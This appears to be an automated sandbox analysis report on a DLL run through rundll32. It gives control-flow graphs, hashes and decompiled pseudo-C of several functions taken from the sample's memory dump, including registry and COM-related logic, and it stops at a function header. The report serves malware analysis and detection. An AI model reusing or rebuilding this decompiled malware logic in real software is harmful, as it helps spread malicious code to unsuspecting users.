                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C312D4, Relevance: .2, Instructions: 222COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 126 4c312d4-4c31306 128 4c3157b-4c31582 126->128 129 4c3130c-4c3132a 126->129 131 4c31330-4c31359 call 4c3a7bc call 4c395b1 129->131 132 4c3156b-4c3156f 129->132 137 4c3155b-4c3155f 131->137 138 4c3135f-4c31384 131->138 132->128 137->132 140 4c31386-4c3139d 138->140 141 4c313aa-4c3140e 138->141 140->141 146 4c31414-4c3142d 141->146 147 4c31559 141->147 149 4c31476-4c31478 146->149 147->137 150 4c3147a 149->150 151 4c3142f-4c31436 149->151 152 4c3147e-4c31484 150->152 155 4c3143f-4c31441 151->155 153 4c31486-4c3148c 152->153 154 4c31494 152->154 156 4c31492 153->156 157 4c31530-4c31538 153->157 158 4c31496-4c3149c 154->158 159 4c3149e-4c314be 154->159 160 4c31443-4c31466 155->160 161 4c31469-4c31473 155->161 156->154 163 4c31543-4c31547 157->163 158->159 162 4c314eb-4c314f2 158->162 169 4c314c0-4c314c5 159->169 170 4c314c9-4c314cc 159->170 160->161 161->149 168 4c314fb-4c314fd 162->168 164 4c3153a-4c3153c 163->164 165 4c31549-4c3154c 163->165 171 4c31542 164->171 172 4c3153e-4c31540 164->172 175 4c31555-4c31557 165->175 173 4c31513-4c31526 168->173 174 4c314ff-4c31510 168->174 169->170 176 4c314c7 169->176 177 4c314d1-4c314e8 call 4c35544 170->177 178 4c314ce-4c314d0 170->178 171->163 172->171 173->162 184 4c31528-4c3152b 173->184 174->173 175->132 176->170 177->162 178->177 184->152
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: a1ed7b2f27d42fc66abf805b3d32d8e1b3911db34e81b7bd641a30a88d9ef35f
                                                                                                                                                                                                                                    • Instruction ID: 8bc5be279adfe0f928f2cb0fe5d72ab4901e5e428f30d82630db07478df0ce62
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1ed7b2f27d42fc66abf805b3d32d8e1b3911db34e81b7bd641a30a88d9ef35f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB814AB6D00119AFDF11DFA5DC84AEEBBBAFB48302F144166E506E6250DB35AE44CF60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C3225B, Relevance: .2, Instructions: 159COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 186 4c3225b-4c32276 call 4c3550e 189 4c32278-4c32286 186->189 190 4c3228c-4c3229a 186->190 189->190 192 4c322ac-4c322c7 call 4c33d0d 190->192 193 4c3229c-4c3229f 190->193 198 4c322d1 192->198 199 4c322c9-4c322cf 192->199 193->192 194 4c322a1-4c322a6 193->194 194->192 196 4c3242d 194->196 200 4c3242f-4c32435 196->200 201 4c322d7-4c322ec call 4c31bf4 call 4c31b2f 198->201 199->201 206 4c322f7-4c322fc 201->206 207 4c322ee 201->207 208 4c32322-4c3233a call 4c32049 206->208 209 4c322fe-4c32303 206->209 207->206 218 4c32366-4c32368 208->218 219 4c3233c-4c32364 call 4c3a7bc 208->219 211 4c32419-4c3241d 209->211 212 4c32309 209->212 215 4c32425-4c3242b 211->215 216 4c3241f-4c32423 211->216 213 4c3230c-4c3231b call 4c3a501 212->213 224 4c3231d 213->224 215->200 216->200 216->215 223 4c32369-4c3236d 218->223 219->223 223->211 226 4c32373-4c32389 223->226 224->211 229 4c3238b-4c323b7 226->229 230 4c323b9-4c323bb 226->230 231 4c323bc-4c323c0 229->231 230->231 231->211 233 4c323c2-4c323e2 call 4c3269c call 4c34094 231->233 233->211 238 4c323e4-4c323eb call 4c396a4 233->238 241 4c323f2-4c323f9 238->241 242 4c323ed-4c323f0 238->242 243 4c323fb-4c323fd 241->243 244 4c3240e-4c32412 call 4c36786 241->244 242->211 243->211 245 4c323ff-4c32403 call 4c33dd9 243->245 248 4c32417 244->248 249 4c32408-4c3240c 245->249 248->211 249->211 249->244
                                                                                                                                                                                                                                    C-Code - Quality: 29%
                                                                                                                                                                                                                                    			E04C3225B(signed int __edx) {
				signed int _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				signed int _t32;
				signed int _t41;
				signed int _t42;
				signed int _t43;
				signed int _t45;
				intOrPtr _t47;
				intOrPtr* _t49;
				signed int _t51;
				signed char _t53;
				intOrPtr _t55;
				signed int _t56;
				intOrPtr _t59;
				signed int _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t65;

				_t58 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E04C3550E();
				if(_t21 != 0) {
					_t56 =  *0x4c3d25c; // 0x4000000a
					_t52 = (_t56 & 0xf0000000) + _t21;
					 *0x4c3d25c = (_t56 & 0xf0000000) + _t21;
				}
				_t22 =  *0x4c3d164(0, 2);
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E04C33D0D( &_v8,  &_v20); // executed
					_t51 = _t25;
					_t26 =  *0x4c3d27c; // 0x202a5a8
					if( *0x4c3d25c > 5) {
						_t8 = _t26 + 0x4c3e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x4c3ea15; // 0x44283a44
						_t27 = _t7;
					}
					E04C31BF4(_t27, _t27);
					_t31 = E04C31B2F(_t58,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						__imp__(_v20);
					}
					_t59 = 5;
					if(_t51 != _t59) {
						 *0x4c3d270 =  *0x4c3d270 ^ 0x81bbe65d;
						_t32 = E04C32049(_t31, 0x60);
						__eflags = _t32;
						 *0x4c3d32c = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							L04C3A7BC();
							_t47 =  *0x4c3d32c; // 0x6c695b0
							_t65 = _t65 + 0xc;
							__imp__(_t47 + 0x40, _t32, 0, 0x60);
							_t49 =  *0x4c3d32c; // 0x6c695b0
							 *_t49 = 0x4c3e836;
						}
						__eflags = 0;
						_t51 = 0;
						if(0 == 0) {
							__imp__( *0x4c3d238, 0, 0x43);
							__eflags = 0;
							 *0x4c3d2c4 = 0;
							if(0 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t53 =  *0x4c3d25c; // 0x4000000a
								_t58 = _t53 & 0x000000ff;
								_t55 =  *0x4c3d27c; // 0x202a5a8
								_t13 = _t55 + 0x4c3e55a; // 0x697a6f4d
								_t52 = _t13;
								 *0x4c3d120(0, _t13, _t53 & 0x000000ff, _t53 & 0x000000ff, 0x4c3c2a7);
							}
							__eflags = 0;
							_t51 = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E04C3269C( ~_v8 &  *0x4c3d270, 0x4c3d00c); // executed
								_t41 = E04C34094(_t52); // executed
								_t51 = _t41;
								__eflags = _t51;
								if(_t51 != 0) {
									goto L30;
								}
								_t42 = E04C396A4(_t52); // executed
								__eflags = _t42;
								if(_t42 != 0) {
									__eflags = _v8;
									_t62 = _v12;
									if(_v8 != 0) {
										L29:
										_t43 = E04C36786(_t58, _t62, _v8); // executed
										_t51 = _t43;
										goto L30;
									}
									__eflags = _t62;
									if(__eflags == 0) {
										goto L30;
									}
									_t45 = E04C33DD9(__eflags, _t62 + 4); // executed
									_t51 = _t45;
									__eflags = _t51;
									if(_t51 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t51 = 8;
							}
						}
					} else {
						_t63 = _v12;
						if(_t63 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x4c3d160();
							}
							goto L34;
						}
						_t64 = _t63 + 4;
						do {
						} while (E04C3A501(_t59, _t64, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t51 = _t22;
					L34:
					return _t51;
				}
			}































                                                                                                                                                                                                                                    0x04c3225b
                                                                                                                                                                                                                                    0x04c32266
                                                                                                                                                                                                                                    0x04c32269
                                                                                                                                                                                                                                    0x04c3226c
                                                                                                                                                                                                                                    0x04c3226f
                                                                                                                                                                                                                                    0x04c32276
                                                                                                                                                                                                                                    0x04c32278
                                                                                                                                                                                                                                    0x04c32284
                                                                                                                                                                                                                                    0x04c32286
                                                                                                                                                                                                                                    0x04c32286
                                                                                                                                                                                                                                    0x04c3228f
                                                                                                                                                                                                                                    0x04c32297
                                                                                                                                                                                                                                    0x04c3229a
                                                                                                                                                                                                                                    0x04c322b4
                                                                                                                                                                                                                                    0x04c322c0
                                                                                                                                                                                                                                    0x04c322c2
                                                                                                                                                                                                                                    0x04c322c7
                                                                                                                                                                                                                                    0x04c322d1
                                                                                                                                                                                                                                    0x04c322d1
                                                                                                                                                                                                                                    0x04c322c9
                                                                                                                                                                                                                                    0x04c322c9
                                                                                                                                                                                                                                    0x04c322c9
                                                                                                                                                                                                                                    0x04c322c9
                                                                                                                                                                                                                                    0x04c322d8
                                                                                                                                                                                                                                    0x04c322e5
                                                                                                                                                                                                                                    0x04c322ec
                                                                                                                                                                                                                                    0x04c322f1
                                                                                                                                                                                                                                    0x04c322f1
                                                                                                                                                                                                                                    0x04c322f9
                                                                                                                                                                                                                                    0x04c322fc
                                                                                                                                                                                                                                    0x04c32322
                                                                                                                                                                                                                                    0x04c3232e
                                                                                                                                                                                                                                    0x04c32333
                                                                                                                                                                                                                                    0x04c32335
                                                                                                                                                                                                                                    0x04c3233a
                                                                                                                                                                                                                                    0x04c32366
                                                                                                                                                                                                                                    0x04c32368
                                                                                                                                                                                                                                    0x04c3233c
                                                                                                                                                                                                                                    0x04c32340
                                                                                                                                                                                                                                    0x04c32345
                                                                                                                                                                                                                                    0x04c3234a
                                                                                                                                                                                                                                    0x04c32351
                                                                                                                                                                                                                                    0x04c32357
                                                                                                                                                                                                                                    0x04c3235c
                                                                                                                                                                                                                                    0x04c32362
                                                                                                                                                                                                                                    0x04c32369
                                                                                                                                                                                                                                    0x04c3236b
                                                                                                                                                                                                                                    0x04c3236d
                                                                                                                                                                                                                                    0x04c3237c
                                                                                                                                                                                                                                    0x04c32382
                                                                                                                                                                                                                                    0x04c32384
                                                                                                                                                                                                                                    0x04c32389
                                                                                                                                                                                                                                    0x04c323b9
                                                                                                                                                                                                                                    0x04c323bb
                                                                                                                                                                                                                                    0x04c3238b
                                                                                                                                                                                                                                    0x04c3238b
                                                                                                                                                                                                                                    0x04c32391
                                                                                                                                                                                                                                    0x04c3239e
                                                                                                                                                                                                                                    0x04c323a4
                                                                                                                                                                                                                                    0x04c323a4
                                                                                                                                                                                                                                    0x04c323ac
                                                                                                                                                                                                                                    0x04c323b5
                                                                                                                                                                                                                                    0x04c323bc
                                                                                                                                                                                                                                    0x04c323be
                                                                                                                                                                                                                                    0x04c323c0
                                                                                                                                                                                                                                    0x04c323c7
                                                                                                                                                                                                                                    0x04c323d4
                                                                                                                                                                                                                                    0x04c323d9
                                                                                                                                                                                                                                    0x04c323de
                                                                                                                                                                                                                                    0x04c323e0
                                                                                                                                                                                                                                    0x04c323e2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c323e4
                                                                                                                                                                                                                                    0x04c323e9
                                                                                                                                                                                                                                    0x04c323eb
                                                                                                                                                                                                                                    0x04c323f2
                                                                                                                                                                                                                                    0x04c323f6
                                                                                                                                                                                                                                    0x04c323f9
                                                                                                                                                                                                                                    0x04c3240e
                                                                                                                                                                                                                                    0x04c32412
                                                                                                                                                                                                                                    0x04c32417
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c32417
                                                                                                                                                                                                                                    0x04c323fb
                                                                                                                                                                                                                                    0x04c323fd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c32403
                                                                                                                                                                                                                                    0x04c32408
                                                                                                                                                                                                                                    0x04c3240a
                                                                                                                                                                                                                                    0x04c3240c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3240c
                                                                                                                                                                                                                                    0x04c323ef
                                                                                                                                                                                                                                    0x04c323ef
                                                                                                                                                                                                                                    0x04c323c0
                                                                                                                                                                                                                                    0x04c322fe
                                                                                                                                                                                                                                    0x04c322fe
                                                                                                                                                                                                                                    0x04c32303
                                                                                                                                                                                                                                    0x04c32419
                                                                                                                                                                                                                                    0x04c3241d
                                                                                                                                                                                                                                    0x04c32425
                                                                                                                                                                                                                                    0x04c32425
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3241d
                                                                                                                                                                                                                                    0x04c32309
                                                                                                                                                                                                                                    0x04c3230c
                                                                                                                                                                                                                                    0x04c32316
                                                                                                                                                                                                                                    0x04c3231d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3242d
                                                                                                                                                                                                                                    0x04c3242d
                                                                                                                                                                                                                                    0x04c32431
                                                                                                                                                                                                                                    0x04c32435
                                                                                                                                                                                                                                    0x04c32435

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: c52ed88fe02b27c5285e3b6832d42983ed8de01b7b43e581d57219da155a9cc2
                                                                                                                                                                                                                                    • Instruction ID: 51b7eb43e38bd7d4b1f4b45f7d532cd920cd12434c147e91e51e759e63f9c329
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c52ed88fe02b27c5285e3b6832d42983ed8de01b7b43e581d57219da155a9cc2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7851F3B5A00214ABEF20DBA5DC84B6E77BAEB04717F0444A6E503E7140E779FE04AB91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C33DD9, Relevance: .2, Instructions: 155COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 250 4c33dd9-4c33e1b call 4c3a7bc call 4c36a12 255 4c33e21-4c33e2c 250->255 256 4c33f69-4c33f6b 250->256 259 4c33e33-4c33e35 255->259 257 4c33f6c-4c33f72 256->257 260 4c33e3b-4c33e47 call 4c3a72d 259->260 261 4c33f5c-4c33f5e 259->261 267 4c33e49 260->267 268 4c33e4c-4c33e5e call 4c3809f 260->268 263 4c33f5f-4c33f67 call 4c39039 261->263 263->257 267->268 271 4c33e64-4c33e80 call 4c3809f 268->271 272 4c33f4b-4c33f4d 268->272 277 4c33e82-4c33e9f call 4c36bfa call 4c39039 271->277 278 4c33ea1-4c33ea3 271->278 274 4c33f4e-4c33f53 272->274 274->263 276 4c33f55-4c33f5a call 4c31f99 274->276 276->263 280 4c33ea4-4c33ea6 277->280 278->280 283 4c33f41-4c33f49 call 4c39039 280->283 284 4c33eac-4c33eb3 280->284 283->274 286 4c33eb5-4c33ecc call 4c3809f 284->286 287 4c33ef4-4c33f1f call 4c38f83 call 4c31c74 284->287 296 4c33ece-4c33eeb call 4c36bfa call 4c39039 286->296 297 4c33eed-4c33eef 286->297 302 4c33f21-4c33f37 call 4c342ea 287->302 303 4c33f39-4c33f3c call 4c39039 287->303 301 4c33ef0-4c33ef2 296->301 297->301 301->283 301->287 302->303 303->283
                                                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                                                    			E04C33DD9(void* __eflags, char _a4) {
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				void* _v36;
				char _v40;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				void* __ebx;
				void* __esi;
				intOrPtr _t39;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				intOrPtr _t60;
				void* _t70;
				intOrPtr _t75;

				_push(0x2c);
				_push(0);
				_push( &_v84);
				_v88 = 0;
				L04C3A7BC();
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t39 =  *0x4c3d27c; // 0x202a5a8
				_t5 = _t39 + 0x4c3ee40; // 0x410025
				_t41 = E04C36A12(_t5);
				_t75 = _t41;
				_v16 = _t75;
				if(_t75 == 0) {
					_t70 = 8;
					L24:
					return _t70;
				}
				__imp__(_t75);
				_t43 =  *0x4c3d114(_t75, _a4, _t41); // executed
				if(_t43 != 0) {
					_t70 = 1;
					L22:
					E04C39039(_t43, _v16);
					goto L24;
				}
				if(E04C3A72D(0,  &_a4) != 0) {
					_a4 = 0;
				}
				_t43 = E04C3809F(0,  *0x4c3d33c);
				_v12 = _t43;
				if(_t43 == 0) {
					_t70 = 8;
					goto L19;
				} else {
					_t48 =  *0x4c3d27c; // 0x202a5a8
					_t11 = _t48 + 0x4c3e81a; // 0x65696c43
					_t51 = E04C3809F(0, _t11);
					_t77 = _t51;
					if(_t51 == 0) {
						_t70 = 8;
					} else {
						_t70 = E04C36BFA(_a4, 0x80000001, _v12, _t77,  &_v88,  &_v84);
						_t51 = E04C39039(_t68, _t77);
					}
					if(_t70 != 0) {
						L17:
						_t43 = E04C39039(_t51, _v12);
						L19:
						_t76 = _a4;
						if(_a4 != 0) {
							_t43 = E04C31F99(_t76);
						}
						goto L22;
					} else {
						if(( *0x4c3d260 & 0x00000001) == 0) {
							L14:
							E04C38F83(_t70, _v88, _v84,  *0x4c3d270, 0);
							_t70 = E04C31C74(_v88,  &_v80,  &_v76, 0);
							if(_t70 == 0) {
								_v24 = _a4;
								_v20 =  &_v88;
								_t70 = E04C342EA( &_v40, 0);
							}
							_t51 = E04C39039(_t56, _v88);
							goto L17;
						}
						_t60 =  *0x4c3d27c; // 0x202a5a8
						_t18 = _t60 + 0x4c3e823; // 0x65696c43
						_t51 = E04C3809F(0, _t18);
						_t79 = _t51;
						if(_t51 == 0) {
							_t70 = 8;
						} else {
							_t70 = E04C36BFA(_a4, 0x80000001, _v12, _t79,  &_v72,  &_v68);
							_t51 = E04C39039(_t65, _t79);
						}
						if(_t70 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}

























                                                                                                                                                                                                                                    0x04c33de4
                                                                                                                                                                                                                                    0x04c33de9
                                                                                                                                                                                                                                    0x04c33dea
                                                                                                                                                                                                                                    0x04c33deb
                                                                                                                                                                                                                                    0x04c33dee
                                                                                                                                                                                                                                    0x04c33df5
                                                                                                                                                                                                                                    0x04c33dfb
                                                                                                                                                                                                                                    0x04c33dfc
                                                                                                                                                                                                                                    0x04c33dfd
                                                                                                                                                                                                                                    0x04c33dfe
                                                                                                                                                                                                                                    0x04c33dff
                                                                                                                                                                                                                                    0x04c33e00
                                                                                                                                                                                                                                    0x04c33e08
                                                                                                                                                                                                                                    0x04c33e0f
                                                                                                                                                                                                                                    0x04c33e14
                                                                                                                                                                                                                                    0x04c33e18
                                                                                                                                                                                                                                    0x04c33e1b
                                                                                                                                                                                                                                    0x04c33f6b
                                                                                                                                                                                                                                    0x04c33f6e
                                                                                                                                                                                                                                    0x04c33f72
                                                                                                                                                                                                                                    0x04c33f72
                                                                                                                                                                                                                                    0x04c33e22
                                                                                                                                                                                                                                    0x04c33e2d
                                                                                                                                                                                                                                    0x04c33e35
                                                                                                                                                                                                                                    0x04c33f5e
                                                                                                                                                                                                                                    0x04c33f5f
                                                                                                                                                                                                                                    0x04c33f62
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c33f62
                                                                                                                                                                                                                                    0x04c33e47
                                                                                                                                                                                                                                    0x04c33e49
                                                                                                                                                                                                                                    0x04c33e49
                                                                                                                                                                                                                                    0x04c33e54
                                                                                                                                                                                                                                    0x04c33e5b
                                                                                                                                                                                                                                    0x04c33e5e
                                                                                                                                                                                                                                    0x04c33f4d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c33e64
                                                                                                                                                                                                                                    0x04c33e64
                                                                                                                                                                                                                                    0x04c33e69
                                                                                                                                                                                                                                    0x04c33e72
                                                                                                                                                                                                                                    0x04c33e77
                                                                                                                                                                                                                                    0x04c33e80
                                                                                                                                                                                                                                    0x04c33ea3
                                                                                                                                                                                                                                    0x04c33e82
                                                                                                                                                                                                                                    0x04c33e98
                                                                                                                                                                                                                                    0x04c33e9a
                                                                                                                                                                                                                                    0x04c33e9a
                                                                                                                                                                                                                                    0x04c33ea6
                                                                                                                                                                                                                                    0x04c33f41
                                                                                                                                                                                                                                    0x04c33f44
                                                                                                                                                                                                                                    0x04c33f4e
                                                                                                                                                                                                                                    0x04c33f4e
                                                                                                                                                                                                                                    0x04c33f53
                                                                                                                                                                                                                                    0x04c33f55
                                                                                                                                                                                                                                    0x04c33f55
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c33eac
                                                                                                                                                                                                                                    0x04c33eb3
                                                                                                                                                                                                                                    0x04c33ef4
                                                                                                                                                                                                                                    0x04c33f05
                                                                                                                                                                                                                                    0x04c33f1b
                                                                                                                                                                                                                                    0x04c33f1f
                                                                                                                                                                                                                                    0x04c33f24
                                                                                                                                                                                                                                    0x04c33f2a
                                                                                                                                                                                                                                    0x04c33f37
                                                                                                                                                                                                                                    0x04c33f37
                                                                                                                                                                                                                                    0x04c33f3c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c33f3c
                                                                                                                                                                                                                                    0x04c33eb5
                                                                                                                                                                                                                                    0x04c33eba
                                                                                                                                                                                                                                    0x04c33ec3
                                                                                                                                                                                                                                    0x04c33ec8
                                                                                                                                                                                                                                    0x04c33ecc
                                                                                                                                                                                                                                    0x04c33eef
                                                                                                                                                                                                                                    0x04c33ece
                                                                                                                                                                                                                                    0x04c33ee4
                                                                                                                                                                                                                                    0x04c33ee6
                                                                                                                                                                                                                                    0x04c33ee6
                                                                                                                                                                                                                                    0x04c33ef2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c33ef2
                                                                                                                                                                                                                                    0x04c33ea6

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: b43c034868cfd7f9715bf18adf1af4f81cc67b7c048f1edb02cd01131c642014
                                                                                                                                                                                                                                    • Instruction ID: 9d387f1ebfe547c91a2c4aab81b31bbec42ba792354114a8c996ec2b7d9ed955
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b43c034868cfd7f9715bf18adf1af4f81cc67b7c048f1edb02cd01131c642014
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B415072A01258AFEB11EFE4CC84DEE7BBEEF08746F044165B905A7120D675EE449BA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C3163F, Relevance: .2, Instructions: 152COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 310 4c3163f-4c3168b 312 4c31691-4c316bd 310->312 313 4c317af-4c317b2 310->313 319 4c316c3-4c316cf call 4c32436 312->319 320 4c317ac 312->320 314 4c317b4 313->314 315 4c317bd-4c317c0 313->315 314->315 316 4c317c2 315->316 317 4c317cb-4c317d2 315->317 316->317 319->320 323 4c316d5-4c316e5 319->323 320->313 323->320 325 4c316eb-4c31711 323->325 325->320 328 4c31717-4c3172b 325->328 330 4c31769-4c3176c 328->330 331 4c3172d-4c31730 328->331 332 4c317a3-4c317a8 330->332 333 4c3176e-4c31773 330->333 331->330 334 4c31732-4c31749 331->334 332->320 333->332 335 4c31775-4c31780 call 4c31a70 333->335 339 4c31760 334->339 340 4c3174b-4c31754 call 4c352f9 334->340 338 4c31785-4c31789 335->338 338->332 341 4c3178b-4c31790 338->341 339->330 340->339 346 4c31756-4c3175e call 4c32436 340->346 343 4c31792-4c3179c 341->343 344 4c3179e 341->344 343->332 344->332 346->339
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: c02eaef508261465181cf279662d257f69d0c803da85f324da57aa78124c879d
                                                                                                                                                                                                                                    • Instruction ID: dbe9e1bb92d9f7b5050453583012f2e179f3fb0878b88ca9ce7abfb56fd25053
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c02eaef508261465181cf279662d257f69d0c803da85f324da57aa78124c879d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6951317A900209EFDB00DFE8C8849AEB7F7FF89341B188869E505EB210DB35AD45CB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C36786, Relevance: .2, Instructions: 150COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
